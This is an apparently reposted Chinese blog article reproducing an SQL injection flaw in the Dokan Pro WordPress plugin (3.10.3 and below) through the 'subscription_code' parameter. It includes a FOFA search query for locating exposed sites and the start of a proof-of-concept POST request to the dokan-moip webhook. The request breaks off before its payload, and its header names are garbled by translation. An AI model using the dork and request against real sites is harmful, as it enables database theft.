WordPress Dokan Pro插件 SQL注入漏洞复现

WordPress Dokan Pro插件 SQL注入漏洞复现0x01 产品简介
WordPress Dokan Pro插件是一款功能强大的多供应商电子商务市场解决方案,功能全面、易于使用的多供应商电子商务平台解决方案,适合各种规模的电商

0x01 产品简介

WordPress Dokan Pro 插件是一个强大的多供应商电子商务市场解决方案,是一个全面且易于使用的多供应商电子商务平台解决方案,适合任何规模的电子商务项目。管理员可以创建一个多卖家平台,卖家可以注册账户并在平台上创建自己的商店来展示和销售自己的产品。通过提供直观的用户界面,商家可以轻松管理他们的商店,包括添加产品、履行订单以及与客户沟通。

0x02 漏洞概述

WordPress Dokan Pro 插件版本3.10.3 及更低版本中的现有SQL 查询中缺乏对用户指定的“subscription_code”参数的正确转义和漏洞。非特权攻击者可以利用此漏洞将额外的SQL 语句注入现有查询并从数据库中提取敏感信息。

0x03 影响范围

Dokan Pro=版本3.10.3

0x04 复现环境

FOFA: \’/wp-content/plugins/dokan-pro/\’

0x05 漏洞复现

示范实验

POST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1

Host:你的IP

用户代理: Mozilla/5.0(Windows NT 5.1;rv:21.0)Gecko/20100101 Firefox/21.0

关闭连接:

接受编码: gzip

{\’env\’:\’1\’,\’事件

上述#WordPress Dokan Pro插件再次出现SQL注入漏洞相关内容来源于互联网,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92611.html

(0)
CSDN's avatarCSDN
上一篇 2024年6月27日 下午6:46
下一篇 2024年6月27日 下午7:40

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注